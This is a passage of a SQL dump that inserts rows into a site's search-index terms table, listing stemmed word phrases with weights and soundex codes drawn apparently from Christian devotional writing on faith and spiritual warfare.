(274743, 'available for', 'avail for', 0, 1, 1.4333, 'A141416', 1, '*'),
(274744, 'available for you', 'avail for you', 0, 1, 1.5667, 'A141416', 1, '*'),
(274745, 'away from any', 'awai from any', 0, 1, 1.4333, 'A165', 1, '*'),
(274746, 'bad students', 'bad students', 0, 1, 1.4, 'B323532', 1, '*'),
(274747, 'bad students they', 'bad students they', 0, 1, 1.5667, 'B3235323', 1, '*'),
(274748, 'basic foundation', 'basic foundation', 0, 1, 1.5333, 'B21535', 1, '*'),
(274749, 'basic foundation on', 'basic foundation on', 0, 1, 1.6333, 'B21535', 1, '*'),
(274750, 'battlefield', 'battlefield', 0, 0, 0.7333, 'B34143', 1, '*'),
(274751, 'battlefield unaware', 'battlefield unaware', 0, 1, 1.6333, 'B3414356', 1, '*'),
(274752, 'battlefield unaware and', 'battlefield unaware and', 0, 1, 1.7667, 'B341435653', 1, '*'),
(274753, 'be a leader', 'be a leader', 0, 1, 1.3667, 'B436', 1, '*'),
(274754, 'be a minister', 'be a minister', 0, 1, 1.4333, 'B5236', 1, '*'),
(274755, 'be a minster', 'be a minster', 0, 1, 1.4, 'B5236', 1, '*'),
(274756, 'be a scholar', 'be a scholar', 0, 1, 1.4, 'B246', 1, '*'),
(274757, 'be a soldier', 'be a soldier', 0, 1, 1.4, 'B2436', 1, '*'),
(274758, 'be an evil', 'be an evil', 0, 1, 1.3333, 'B514', 1, '*'),
(274759, 'be an intercessor', 'be an intercessor', 0, 1, 1.5667, 'B53626', 1, '*'),
(274760, 'be and', 'be and', 0, 1, 1.2, 'B530', 1, '*'),
(274761, 'be and the', 'be and the', 0, 1, 1.3333, 'B530', 1, '*'),
(274762, 'be prepared', 'be prepared', 0, 1, 1.3667, 'B6163', 1, '*'),
(274763, 'be prepared to', 'be prepared to', 0, 1, 1.4667, 'B6163', 1, '*'),
(274764, 'be ready to', 'be ready to', 0, 1, 1.3667, 'B630', 1, '*'),
(274765, 'be the ones', 'be the ones', 0, 1, 1.3667, 'B352', 1, '*'),
(274766, 'behold his', 'behold his', 0, 1, 1.3333, 'B432', 1, '*'),
(274767, 'behold his soul', 'behold his soul', 0, 1, 1.5, 'B4324', 1, '*'),
(274768, 'being and', 'be and', 0, 1, 1.3, 'B5253', 1, '*'),
(274769, 'being and spends', 'be and spends', 0, 1, 1.5333, 'B525321532', 1, '*'),
(274770, 'beings', 'be', 0, 0, 0.4, 'B520', 1, '*'),
(274771, 'beings there', 'be there', 0, 1, 1.4, 'B5236', 1, '*'),
(274772, 'beings there would', 'be there would', 0, 1, 1.6, 'B523643', 1, '*'),
(274773, 'between those', 'between those', 0, 1, 1.4333, 'B3532', 1, '*'),
(274774, 'between those who', 'between those who', 0, 1, 1.5667, 'B3532', 1, '*'),
(274775, 'bible through his', 'bibl through his', 0, 1, 1.5667, 'B4362', 1, '*'),
(274776, 'bible we', 'bibl we', 0, 1, 1.2667, 'B400', 1, '*'),
(274777, 'bible we hear', 'bibl we hear', 0, 1, 1.4333, 'B460', 1, '*'),
(274778, 'books music', 'book music', 0, 1, 1.3667, 'B252', 1, '*'),
(274779, 'books music also', 'book music also', 0, 1, 1.5333, 'B25242', 1, '*'),
(274780, 'broke', 'broke', 0, 0, 0.3333, 'B620', 1, '*'),
(274781, 'broke loose', 'broke loose', 0, 1, 1.3667, 'B6242', 1, '*'),
(274782, 'broke loose in', 'broke loose in', 0, 1, 1.4667, 'B62425', 1, '*'),
(274783, 'but like', 'but like', 0, 1, 1.2667, 'B342', 1, '*'),
(274784, 'but like bad', 'but like bad', 0, 1, 1.4, 'B34213', 1, '*'),
(274785, 'but like we', 'but like we', 0, 1, 1.3667, 'B342', 1, '*'),
(274786, 'but may not', 'but may not', 0, 1, 1.3667, 'B353', 1, '*'),
(274787, 'but on', 'but on', 0, 1, 1.2, 'B350', 1, '*'),
(274788, 'but on things', 'but on things', 0, 1, 1.4333, 'B35352', 1, '*'),
(274789, 'but the just', 'but the just', 0, 1, 1.4, 'B323', 1, '*'),
(274790, 'but those who', 'but those who', 0, 1, 1.4333, 'B320', 1, '*'),
(274791, 'buythe', 'buyth', 0, 0, 0.4, 'B300', 1, '*'),
(274792, 'buythe truth', 'buyth truth', 0, 1, 1.4, 'B363', 1, '*'),
(274793, 'buythe truth and', 'buyth truth and', 0, 1, 1.5333, 'B36353', 1, '*'),
(274794, 'by faith that', 'by faith that', 0, 1, 1.4333, 'B300', 1, '*'),
(274795, 'by his faith', 'by his faith', 0, 1, 1.4, 'B213', 1, '*'),
(274796, 'by looking', 'by looking', 0, 1, 1.3333, 'B4252', 1, '*'),
(274797, 'by looking at', 'by looking at', 0, 1, 1.4333, 'B42523', 1, '*'),
(274798, 'by praying for', 'by praying for', 0, 1, 1.4667, 'B65216', 1, '*'),
(274799, 'by praying now', 'by praying now', 0, 1, 1.4667, 'B6525', 1, '*'),
(274800, 'by your pastor', 'by your pastor', 0, 1, 1.4667, 'B61236', 1, '*'),
(274801, 'called us to', 'call us to', 0, 1, 1.4, 'C4323', 1, '*'),
(274802, 'called you to', 'call you to', 0, 1, 1.4333, 'C430', 2, '*'),
(274803, 'can be and', 'can be and', 0, 1, 1.3333, 'C5153', 1, '*'),
(274804, 'can be found', 'can be found', 0, 1, 1.4, 'C5153', 1, '*'),
(274805, 'can do as', 'can do as', 0, 1, 1.3, 'C532', 1, '*'),
(274806, 'can do this', 'can do this', 0, 1, 1.3667, 'C532', 1, '*'),
(274807, 'can properly', 'can properly', 0, 1, 1.4, 'C516164', 1, '*'),
(274808, 'can properly accept', 'can properly accept', 0, 1, 1.6333, 'C516164213', 1, '*'),
(274809, 'can use', 'can use', 0, 1, 1.2333, 'C520', 1, '*'),
(274810, 'can use the', 'can use the', 0, 1, 1.3667, 'C523', 1, '*'),
(274811, 'cannot give', 'cannot give', 0, 1, 1.3667, 'C5321', 1, '*'),
(274812, 'cannot give what', 'cannot give what', 0, 1, 1.5333, 'C53213', 1, '*'),
(274813, 'capacity somewhere', 'capac somewhere', 0, 1, 1.6, 'C123256', 1, '*'),
(274814, 'capacity somewhere and', 'capac somewhere and', 0, 1, 1.7333, 'C12325653', 1, '*'),
(274815, 'capacity spiritual', 'capac spiritual', 0, 1, 1.6, 'C12321634', 1, '*'),
(274816, 'capacity spiritual wisdom', 'capac spiritual wisdom', 0, 1, 1.8333, 'C12321634235', 1, '*'),
(274817, 'car', 'car', 0, 0, 0.2, 'C600', 2, '*'),
(274818, 'car so', 'car so', 0, 1, 1.2, 'C620', 1, '*'),
(274819, 'car so also', 'car so also', 0, 1, 1.3667, 'C6242', 1, '*'),
(274820, 'change the', 'chang the', 0, 1, 1.3333, 'C523', 1, '*'),
(274821, 'change the world', 'chang the world', 0, 1, 1.5333, 'C523643', 1, '*'),
(274822, 'changing', 'chang', 0, 0, 0.5333, 'C5252', 1, '*'),
(274823, 'changing into', 'chang into', 0, 1, 1.4333, 'C525253', 1, '*'),
(274824, 'changing into the', 'chang into the', 0, 1, 1.5667, 'C525253', 1, '*'),
(274825, 'chapter 3', 'chapter 3', 0, 1, 1.3, 'C136', 1, '*'),
(274826, 'chapter 3 are', 'chapter 3 are', 0, 1, 1.4333, 'C136', 1, '*'),
(274827, 'chapter every', 'chapter every', 0, 1, 1.4333, 'C13616', 1, '*'),
(274828, 'chapter every christian', 'chapter every christian', 0, 1, 1.7667, 'C1361626235', 1, '*'),
(274829, 'christian do', 'christian do', 0, 1, 1.4, 'C62353', 1, '*'),
(274830, 'christian do you', 'christian do you', 0, 1, 1.5333, 'C62353', 1, '*'),
(274831, 'christian it', 'christian it', 0, 1, 1.4, 'C62353', 1, '*'),
(274832, 'christian it is', 'christian it is', 0, 1, 1.5, 'C623532', 1, '*'),
(274833, 'christian must play', 'christian must play', 0, 1, 1.6333, 'C62352314', 1, '*'),
(274834, 'christian or', 'christian or', 0, 1, 1.4, 'C62356', 1, '*'),
(274835, 'christian or a', 'christian or a', 0, 1, 1.4667, 'C62356', 1, '*'),
(274836, 'christian should play', 'christian should play', 0, 1, 1.7, 'C623524314', 1, '*'),
(274837, 'christian tapes', 'christian tapes', 0, 1, 1.5, 'C6235312', 1, '*'),
(274838, 'christian tapes books', 'christian tapes books', 0, 1, 1.7, 'C623531212', 1, '*'),
(274839, 'christian was', 'christian was', 0, 1, 1.4333, 'C62352', 1, '*'),
(274840, 'christian was given', 'christian was given', 0, 1, 1.6333, 'C6235215', 1, '*'),
(274841, 'christian who', 'christian who', 0, 1, 1.4333, 'C6235', 1, '*'),
(274842, 'christian who doesn\'t', 'christian who doesn', 0, 1, 1.7, 'C62353253', 1, '*'),
(274843, 'christianity is', 'christian is', 0, 1, 1.5, 'C623532', 1, '*'),
(274844, 'christianity is an', 'christian is an', 0, 1, 1.6, 'C6235325', 1, '*'),
(274845, 'christianity rests', 'christian rests', 0, 1, 1.6, 'C623536232', 1, '*'),
(274846, 'christianity rests faith', 'christian rests faith', 0, 1, 1.8, 'C62353623213', 1, '*'),
(274847, 'christians and it\'s', 'christian and it', 0, 1, 1.6333, 'C62352532', 1, '*'),
(274848, 'christians and your', 'christian and your', 0, 1, 1.6333, 'C62352536', 1, '*'),
(274849, 'christians are let', 'christian are let', 0, 1, 1.6, 'C62352643', 1, '*'),
(274850, 'christians are to', 'christian are to', 0, 1, 1.5667, 'C6235263', 1, '*'),
(274851, 'christians church', 'christian church', 0, 1, 1.5667, 'C6235262', 1, '*'),
(274852, 'christians church family', 'christian church family', 0, 1, 1.8, 'C6235262154', 1, '*'),
(274853, 'christians god', 'christian god', 0, 1, 1.4667, 'C623523', 1, '*'),
(274854, 'christians god has', 'christian god has', 0, 1, 1.6, 'C6235232', 1, '*'),
(274855, 'christians have overlooked', 'christian have overlooked', 0, 1, 1.8667, 'C6235216423', 1, '*'),
(274856, 'christians it', 'christian it', 0, 1, 1.4333, 'C623523', 1, '*'),
(274857, 'christians it is', 'christian it is', 0, 1, 1.5333, 'C6235232', 1, '*'),
(274858, 'christians to wake', 'christian to wake', 0, 1, 1.6, 'C6235232', 1, '*'),
(274859, 'church a', 'church a', 0, 1, 1.2667, 'C620', 1, '*'),
(274860, 'church a lot', 'church a lot', 0, 1, 1.4, 'C6243', 1, '*'),
(274861, 'church family', 'church family', 0, 1, 1.4333, 'C62154', 1, '*'),
(274862, 'church family friends', 'church family friends', 0, 1, 1.7, 'C6215416532', 1, '*'),
(274863, 'church ignites', 'church ignites', 0, 1, 1.4667, 'C62532', 1, '*'),
(274864, 'church ignites the', 'church ignites the', 0, 1, 1.6, 'C625323', 1, '*'),
(274865, 'church membership serious', 'church membership serious', 0, 1, 1.8333, 'C6251621262', 1, '*'),
(274866, 'church or', 'church or', 0, 1, 1.3, 'C626', 1, '*'),
(274867, 'church or at', 'church or at', 0, 1, 1.4, 'C6263', 1, '*'),
(274868, 'claim', 'claim', 0, 0, 0.3333, 'C450', 1, '*'),
(274869, 'claim it', 'claim it', 0, 1, 1.2667, 'C453', 1, '*'),
(274870, 'claim it a', 'claim it a', 0, 1, 1.3333, 'C453', 1, '*'),
(274871, 'clothes', 'cloth', 0, 0, 0.4667, 'C432', 1, '*'),
(274872, 'clothes food', 'cloth food', 0, 1, 1.4, 'C43213', 1, '*'),
(274873, 'clothes food etc', 'cloth food etc', 0, 1, 1.5333, 'C432132', 1, '*'),
(274874, 'cohorts', 'cohort', 0, 0, 0.4667, 'C632', 1, '*'),
(274875, 'cohorts not', 'cohort not', 0, 1, 1.3667, 'C63253', 1, '*'),
(274876, 'cohorts not a', 'cohort not a', 0, 1, 1.4333, 'C63253', 1, '*'),
(274877, 'commission to', 'commiss to', 0, 1, 1.4333, 'C5253', 1, '*'),
(274878, 'commission to win', 'commiss to win', 0, 1, 1.5667, 'C52535', 1, '*'),
(274879, 'communication', 'commun', 0, 0, 0.8667, 'C5235', 2, '*'),
(274880, 'communication with', 'commun with', 0, 1, 1.6, 'C52353', 1, '*'),
(274881, 'communication with god', 'commun with god', 0, 1, 1.7333, 'C5235323', 1, '*'),
(274882, 'concerning something', 'concern something', 0, 1, 1.6667, 'C526525352', 1, '*'),
(274883, 'concerning something god', 'concern something god', 0, 1, 1.8, 'C5265253523', 1, '*'),
(274884, 'conduct', 'conduct', 0, 0, 0.4667, 'C5323', 1, '*'),
(274885, 'conduct spiritual', 'conduct spiritual', 0, 1, 1.5667, 'C532321634', 1, '*'),
(274886, 'conduct spiritual warfare', 'conduct spiritual warfare', 0, 1, 1.8333, 'C532321634616', 1, '*'),
(274887, 'confusions', 'confus', 0, 0, 0.6667, 'C51252', 1, '*'),
(274888, 'confusions there', 'confus there', 0, 1, 1.5333, 'C5125236', 1, '*'),
(274889, 'confusions there no', 'confus there no', 0, 1, 1.6333, 'C51252365', 1, '*'),
(274890, 'consider this', 'consid this', 0, 1, 1.4333, 'C523632', 1, '*'),
(274891, 'consider this if', 'consid this if', 0, 1, 1.5333, 'C5236321', 1, '*'),
(274892, 'contest', 'contest', 0, 0, 0.4667, 'C5323', 1, '*'),
(274893, 'contest the', 'contest the', 0, 1, 1.3667, 'C5323', 1, '*'),
(274894, 'contest the devil', 'contest the devil', 0, 1, 1.5667, 'C532314', 1, '*'),
(274895, 'creating confusions', 'creat confusions', 0, 1, 1.6333, 'C635251252', 1, '*'),
(274896, 'creating confusions there', 'creat confusions there', 0, 1, 1.8333, 'C63525125236', 1, '*'),
(274897, 'daily activities', 'daili activities', 0, 1, 1.5333, 'D423132', 1, '*'),
(274898, 'daily activities 2.you', 'daili activities 2.you', 0, 1, 1.7333, 'D423132', 1, '*'),
(274899, 'day to', 'dai to', 0, 1, 1.2, 'D000', 1, '*'),
(274900, 'day to conduct', 'dai to conduct', 0, 1, 1.4667, 'D25323', 1, '*'),
(274901, 'day when it', 'dai when it', 0, 1, 1.3667, 'D530', 1, '*'),
(274902, 'dealt extensively', 'dealt extensively', 0, 1, 1.5667, 'D43235214', 1, '*'),
(274903, 'dealt extensively with', 'dealt extensively with', 0, 1, 1.7333, 'D432352143', 1, '*'),
(274904, 'degree you', 'degre you', 0, 1, 1.3333, 'D260', 1, '*'),
(274905, 'degree you must', 'degre you must', 0, 1, 1.5, 'D26523', 1, '*'),
(274906, 'depth', 'depth', 0, 0, 0.3333, 'D130', 1, '*'),
(274907, 'depth and', 'depth and', 0, 1, 1.3, 'D1353', 1, '*'),
(274908, 'depth and sensitivity', 'depth and sensitivity', 0, 1, 1.7, 'D1353252313', 1, '*'),
(274909, 'descriptions', 'descript', 0, 0, 0.8, 'D261352', 1, '*'),
(274910, 'descriptions of', 'descript of', 0, 1, 1.5, 'D2613521', 1, '*'),
(274911, 'descriptions of this', 'descript of this', 0, 1, 1.6667, 'D261352132', 1, '*'),
(274912, 'destiny to', 'destini to', 0, 1, 1.3333, 'D2353', 1, '*'),
(274913, 'destiny to the', 'destini to the', 0, 1, 1.4667, 'D2353', 1, '*'),
(274914, 'develop don\'t', 'develop don', 0, 1, 1.4333, 'D141353', 1, '*'),
(274915, 'develop don\'t spare', 'develop don spare', 0, 1, 1.6333, 'D141353216', 1, '*'),
(274916, 'develop our', 'develop our', 0, 1, 1.3667, 'D1416', 1, '*'),
(274917, 'develop our faith', 'develop our faith', 0, 1, 1.5667, 'D141613', 1, '*'),
(274918, 'develop the', 'develop the', 0, 1, 1.3667, 'D1413', 1, '*'),
(274919, 'develop the stamina', 'develop the stamina', 0, 1, 1.6333, 'D1413235', 1, '*'),
(274920, 'develop your intercessory', 'develop your intercessory', 0, 1, 1.8333, 'D141653626', 1, '*'),
(274921, 'development', 'develop', 0, 0, 0.7333, 'D14153', 2, '*'),
(274922, 'development process', 'develop process', 0, 1, 1.6333, 'D14153162', 1, '*'),
(274923, 'development process serious', 'develop process serious', 0, 1, 1.9, 'D1415316262', 1, '*'),
(274924, 'devil and', 'devil and', 0, 1, 1.3, 'D1453', 1, '*'),
(274925, 'devil and his', 'devil and his', 0, 1, 1.4333, 'D14532', 1, '*'),
(274926, 'devil hates', 'devil hates', 0, 1, 1.3667, 'D1432', 1, '*'),
(274927, 'devil hates you', 'devil hates you', 0, 1, 1.5, 'D1432', 1, '*'),
(274928, 'devil is to', 'devil is to', 0, 1, 1.3667, 'D1423', 2, '*'),
(274929, 'devil we', 'devil we', 0, 1, 1.2667, 'D140', 1, '*'),
(274930, 'devil we wrestle', 'devil we wrestle', 0, 1, 1.5333, 'D146234', 1, '*'),
(274931, 'difference between those', 'differ between those', 0, 1, 1.8, 'D165213532', 1, '*'),
(274932, 'direction and you', 'direct and you', 0, 1, 1.5667, 'D62353', 1, '*'),
(274933, 'directly to', 'directli to', 0, 1, 1.3667, 'D62343', 1, '*'),
(274934, 'directly to our', 'directli to our', 0, 1, 1.5, 'D623436', 1, '*'),
(274935, 'divine destiny', 'divin destiny', 0, 1, 1.4667, 'D153235', 1, '*'),
(274936, 'divine destiny to', 'divin destiny to', 0, 1, 1.5667, 'D1532353', 1, '*'),
(274937, 'divine instruction and', 'divin instruction and', 0, 1, 1.7333, 'D152362353', 1, '*'),
(274938, 'divine knowledge', 'divin knowledge', 0, 1, 1.5333, 'D1525432', 1, '*'),
(274939, 'divine knowledge wisdom', 'divin knowledge wisdom', 0, 1, 1.7667, 'D152543235', 1, '*'),
(274940, 'do as', 'do as', 0, 1, 1.1667, 'D200', 1, '*'),
(274941, 'do as a', 'do as a', 0, 1, 1.2333, 'D200', 1, '*'),
(274942, 'do is spend', 'do is spend', 0, 1, 1.3667, 'D2153', 1, '*'),
(274943, 'do that will', 'do that will', 0, 1, 1.4, 'D400', 2, '*'),
(274944, 'do this', 'do this', 0, 1, 1.2333, 'D200', 1, '*'),
(274945, 'do this that', 'do this that', 0, 1, 1.4, 'D230', 1, '*'),
(274946, 'do you change', 'do you change', 0, 1, 1.4333, 'D252', 1, '*'),
(274947, 'do you prepare', 'do you prepare', 0, 1, 1.4667, 'D1616', 1, '*'),
(274948, 'doesn\'t know he\'s', 'doesn know he', 0, 1, 1.5667, 'D253252', 1, '*'),
(274949, 'doesn\'t necessarily', 'doesn necessarily', 0, 1, 1.6333, 'D2535264', 1, '*'),
(274950, 'doesn\'t necessarily mean', 'doesn necessarily mean', 0, 1, 1.8, 'D25352645', 1, '*'),
(274951, 'doesn\'t walk', 'doesn walk', 0, 1, 1.4, 'D25342', 1, '*'),
(274952, 'doesn\'t walk in', 'doesn walk in', 0, 1, 1.5, 'D253425', 1, '*'),
(274953, 'doing this', 'do this', 0, 1, 1.3333, 'D5232', 1, '*'),
(274954, 'doing this there', 'do this there', 0, 1, 1.5333, 'D523236', 1, '*'),
(274955, 'don\'t even know', 'don even know', 0, 1, 1.5, 'D531525', 1, '*'),
(274956, 'don\'t have', 'don have', 0, 1, 1.3333, 'D531', 3, '*'),
(274957, 'don\'t have 4', 'don have 4', 0, 1, 1.4, 'D531', 1, '*'),
(274958, 'don\'t shy', 'don shy', 0, 1, 1.3, 'D532', 1, '*'),
(274959, 'don\'t shy away', 'don shy away', 0, 1, 1.4667, 'D532', 1, '*'),
(274960, 'don\'t spare', 'don spare', 0, 1, 1.3667, 'D53216', 1, '*'),
(274961, 'don\'t spare yourself', 'don spare yourself', 0, 1, 1.6667, 'D53216241', 1, '*'),
(274962, 'dormant', 'dormant', 0, 0, 0.4667, 'D653', 2, '*'),
(274963, 'dormant in', 'dormant in', 0, 1, 1.3333, 'D6535', 1, '*'),
(274964, 'dormant in your', 'dormant in your', 0, 1, 1.5, 'D65356', 1, '*'),
(274965, 'drive', 'drive', 0, 0, 0.3333, 'D610', 1, '*'),
(274966, 'drive a', 'drive a', 0, 1, 1.2333, 'D610', 1, '*'),
(274967, 'drive a car', 'drive a car', 0, 1, 1.3667, 'D6126', 1, '*'),
(274968, 'drive and', 'drive and', 0, 1, 1.3, 'D6153', 1, '*'),
(274969, 'drive and all', 'drive and all', 0, 1, 1.4333, 'D61534', 1, '*'),
(274970, 'drive until', 'drive until', 0, 1, 1.3667, 'D61534', 1, '*'),
(274971, 'drive until you', 'drive until you', 0, 1, 1.5, 'D61534', 1, '*'),
(274972, 'driving', 'drive', 0, 0, 0.4667, 'D6152', 1, '*'),
(274973, 'driving you\'ll', 'drive you', 0, 1, 1.4667, 'D61524', 1, '*'),
(274974, 'driving you\'ll never', 'drive you never', 0, 1, 1.6667, 'D61524516', 1, '*'),
(274975, 'duties in', 'duti in', 0, 1, 1.3, 'D250', 1, '*'),
(274976, 'duties in this', 'duti in this', 0, 1, 1.4667, 'D2532', 1, '*'),
(274977, 'earth habakkuk', 'earth habakkuk', 0, 1, 1.4667, 'E6312', 1, '*'),
(274978, 'earth habakkuk 2', 'earth habakkuk 2', 0, 1, 1.5333, 'E6312', 1, '*'),
(274979, 'earth let', 'earth let', 0, 1, 1.3, 'E6343', 1, '*'),
(274980, 'earth let go', 'earth let go', 0, 1, 1.4, 'E63432', 1, '*'),
(274981, 'earth the', 'earth the', 0, 1, 1.3, 'E630', 1, '*'),
(274982, 'earth the descriptions', 'earth the descriptions', 0, 1, 1.7333, 'E63261352', 1, '*'),
(274983, 'edify', 'edifi', 0, 0, 0.3333, 'E310', 1, '*'),
(274984, 'edify and', 'edifi and', 0, 1, 1.3, 'E3153', 1, '*'),
(274985, 'edify and nourish', 'edifi and nourish', 0, 1, 1.5667, 'E3153562', 1, '*'),
(274986, 'effective followership', 'effect followership', 0, 1, 1.7333, 'E12314621', 1, '*'),
(274987, 'effective followership of', 'effect followership of', 0, 1, 1.8333, 'E12314621', 1, '*'),
(274988, 'effective your', 'effect your', 0, 1, 1.4667, 'E12316', 1, '*'),
(274989, 'effective your faith', 'effect your faith', 0, 1, 1.6667, 'E1231613', 1, '*'),
(274990, 'effectively conduct', 'effect conduct', 0, 1, 1.6333, 'E1231425323', 1, '*'),
(274991, 'effectively conduct spiritual', 'effect conduct spiritual', 0, 1, 1.9667, 'E123142532321634', 1, '*'),
(274992, 'else how', 'els how', 0, 1, 1.2667, 'E420', 1, '*'),
(274993, 'else how do', 'els how do', 0, 1, 1.3667, 'E423', 1, '*'),
(274994, 'embrace it wholeheartedly', 'embrac it wholeheartedly', 0, 1, 1.8333, 'E516234634', 1, '*'),
(274995, 'end changing', 'end changing', 0, 1, 1.4, 'E5325252', 1, '*'),
(274996, 'end changing into', 'end changing into', 0, 1, 1.5667, 'E532525253', 1, '*'),
(274997, 'end upleading', 'end upleading', 0, 1, 1.4333, 'E5314352', 1, '*'),
(274998, 'end upleading everyone', 'end upleading everyone', 0, 1, 1.7333, 'E5314352165', 1, '*'),
(274999, 'engage in intercession', 'engag in intercession', 0, 1, 1.7333, 'E5253625', 1, '*'),
(275000, 'enough this', 'enough this', 0, 1, 1.3667, 'E5232', 1, '*'),
(275001, 'enough this is', 'enough this is', 0, 1, 1.4667, 'E5232', 1, '*'),
(275002, 'ephesians 6', 'ephesian 6', 0, 1, 1.3667, 'E1252', 1, '*'),
(275003, 'ephesians 6 10-18', 'ephesian 6 10-18', 0, 1, 1.5667, 'E1252', 1, '*'),
(275004, 'ephesians 6 18', 'ephesian 6 18', 0, 1, 1.4667, 'E1252', 1, '*'),
(275005, 'ephesians 6 about', 'ephesian 6 about', 0, 1, 1.5667, 'E125213', 1, '*'),
(275006, 'etc but', 'etc but', 0, 1, 1.2333, 'E3213', 1, '*'),
(275007, 'etc but on', 'etc but on', 0, 1, 1.3333, 'E32135', 1, '*'),
(275008, 'even know', 'even know', 0, 1, 1.3, 'E1525', 1, '*'),
(275009, 'even know a', 'even know a', 0, 1, 1.3667, 'E1525', 1, '*'),
(275010, 'every christian was', 'everi christian was', 0, 1, 1.6333, 'E16262352', 1, '*'),
(275011, 'every situation', 'everi situation', 0, 1, 1.5, 'E16235', 2, '*'),
(275012, 'every situation it\'s', 'everi situation it', 0, 1, 1.6667, 'E1623532', 1, '*'),
(275013, 'everyone but', 'everyon but', 0, 1, 1.4, 'E16513', 1, '*'),
(275014, 'everyone but those', 'everyon but those', 0, 1, 1.6, 'E165132', 1, '*'),
(275015, 'everyone else', 'everyon else', 0, 1, 1.4333, 'E16542', 1, '*'),
(275016, 'everyone else how', 'everyon else how', 0, 1, 1.5667, 'E16542', 1, '*'),
(275017, 'everything you need', 'everyth you need', 0, 1, 1.6333, 'E1635253', 1, '*'),
(275018, 'everything you\'ve', 'everyth you', 0, 1, 1.5667, 'E163521', 1, '*'),
(275019, 'everything you\'ve heard', 'everyth you heard', 0, 1, 1.7667, 'E16352163', 1, '*'),
(275020, 'evil day', 'evil day', 0, 1, 1.2667, 'E143', 1, '*'),
(275021, 'evil day when', 'evil day when', 0, 1, 1.4333, 'E1435', 1, '*'),
(275022, 'expects us', 'expect us', 0, 1, 1.3333, 'E21232', 1, '*'),
(275023, 'expects us to', 'expect us to', 0, 1, 1.4333, 'E212323', 1, '*'),
(275024, 'extensively', 'extens', 0, 0, 0.7333, 'E235214', 1, '*'),
(275025, 'extensively with', 'extens with', 0, 1, 1.5333, 'E2352143', 1, '*'),
(275026, 'extensively with in', 'extens with in', 0, 1, 1.6333, 'E23521435', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(275027, 'extremely', 'extrem', 0, 0, 0.6, 'E23654', 1, '*'),
(275028, 'extremely important', 'extrem important', 0, 1, 1.6333, 'E23654516353', 1, '*'),
(275029, 'extremely important for', 'extrem important for', 0, 1, 1.7667, 'E2365451635316', 1, '*'),
(275030, 'face of the', 'face of the', 0, 1, 1.3667, 'F213', 1, '*'),
(275031, 'faith and claim', 'faith and claim', 0, 1, 1.5, 'F353245', 1, '*'),
(275032, 'faith and men', 'faith and men', 0, 1, 1.4333, 'F3535', 1, '*'),
(275033, 'faith as christians', 'faith as christians', 0, 1, 1.6333, 'F3262352', 1, '*'),
(275034, 'faith can', 'faith can', 0, 1, 1.3, 'F325', 1, '*'),
(275035, 'faith can be', 'faith can be', 0, 1, 1.4, 'F3251', 1, '*'),
(275036, 'faith everything', 'faith everything', 0, 1, 1.5333, 'F316352', 1, '*'),
(275037, 'faith everything you', 'faith everything you', 0, 1, 1.6667, 'F316352', 1, '*'),
(275038, 'faith hebrews', 'faith hebrews', 0, 1, 1.4333, 'F3162', 1, '*'),
(275039, 'faith hebrews 11', 'faith hebrews 11', 0, 1, 1.5333, 'F3162', 1, '*'),
(275040, 'faith in the', 'faith in the', 0, 1, 1.4, 'F353', 1, '*'),
(275041, 'faith into', 'faith into', 0, 1, 1.3333, 'F353', 1, '*'),
(275042, 'faith into practice', 'faith into practice', 0, 1, 1.6333, 'F35316232', 1, '*'),
(275043, 'faith is because', 'faith is because', 0, 1, 1.5333, 'F3212', 1, '*'),
(275044, 'faith is like', 'faith is like', 0, 1, 1.4333, 'F3242', 1, '*'),
(275045, 'faith salvation', 'faith salvation', 0, 1, 1.5, 'F324135', 1, '*'),
(275046, 'faith salvation and', 'faith salvation and', 0, 1, 1.6333, 'F3241353', 1, '*'),
(275047, 'faith start', 'faith start', 0, 1, 1.3667, 'F32363', 1, '*'),
(275048, 'faith start putting', 'faith start putting', 0, 1, 1.6333, 'F323631352', 1, '*'),
(275049, 'faith that we', 'faith that we', 0, 1, 1.4333, 'F300', 1, '*'),
(275050, 'family friends', 'famili friends', 0, 1, 1.4667, 'F5416532', 1, '*'),
(275051, 'family friends town', 'famili friends town', 0, 1, 1.6333, 'F541653235', 1, '*'),
(275052, 'far we', 'far we', 0, 1, 1.2, 'F600', 1, '*'),
(275053, 'far we as', 'far we as', 0, 1, 1.3, 'F620', 1, '*'),
(275054, 'fashion contest', 'fashion contest', 0, 1, 1.5, 'F2525323', 1, '*'),
(275055, 'fashion contest the', 'fashion contest the', 0, 1, 1.6333, 'F2525323', 1, '*'),
(275056, 'fellow christians', 'fellow christians', 0, 1, 1.5667, 'F4262352', 1, '*'),
(275057, 'fellow christians church', 'fellow christians church', 0, 1, 1.8, 'F426235262', 1, '*'),
(275058, 'find themselves', 'find themselves', 0, 1, 1.5, 'F5352412', 1, '*'),
(275059, 'find themselves on', 'find themselves on', 0, 1, 1.6, 'F53524125', 1, '*'),
(275060, 'find yourself on', 'find yourself on', 0, 1, 1.5333, 'F5362415', 1, '*'),
(275061, 'fire ofleadership', 'fire ofleadership', 0, 1, 1.5667, 'F6143621', 1, '*'),
(275062, 'fire ofleadership dormant', 'fire ofleadership dormant', 0, 1, 1.8333, 'F61436213653', 1, '*'),
(275063, 'followership', 'followership', 0, 0, 0.8, 'F4621', 1, '*'),
(275064, 'followership of', 'followership of', 0, 1, 1.5, 'F4621', 1, '*'),
(275065, 'followership of the', 'followership of the', 0, 1, 1.6333, 'F46213', 1, '*'),
(275066, 'following things truth', 'follow things truth', 0, 1, 1.7333, 'F452352363', 1, '*'),
(275067, 'food etc', 'food etc', 0, 1, 1.2667, 'F320', 1, '*'),
(275068, 'food etc but', 'food etc but', 0, 1, 1.4, 'F3213', 1, '*'),
(275069, 'for a long', 'for a long', 0, 1, 1.3333, 'F6452', 1, '*'),
(275070, 'for christians', 'for christians', 0, 1, 1.4667, 'F6262352', 1, '*'),
(275071, 'for christians to', 'for christians to', 0, 1, 1.5667, 'F62623523', 1, '*'),
(275072, 'for him wherever', 'for him wherever', 0, 1, 1.5333, 'F65616', 1, '*'),
(275073, 'for leadership', 'for leadership', 0, 1, 1.4667, 'F643621', 1, '*'),
(275074, 'for leadership simple', 'for leadership simple', 0, 1, 1.7, 'F6436212514', 1, '*'),
(275075, 'for long periods', 'for long periods', 0, 1, 1.5333, 'F64521632', 1, '*'),
(275076, 'for the war', 'for the war', 0, 1, 1.3667, 'F636', 1, '*'),
(275077, 'for us as', 'for us as', 0, 1, 1.3, 'F620', 1, '*'),
(275078, 'for you all', 'for you all', 0, 1, 1.3667, 'F640', 1, '*'),
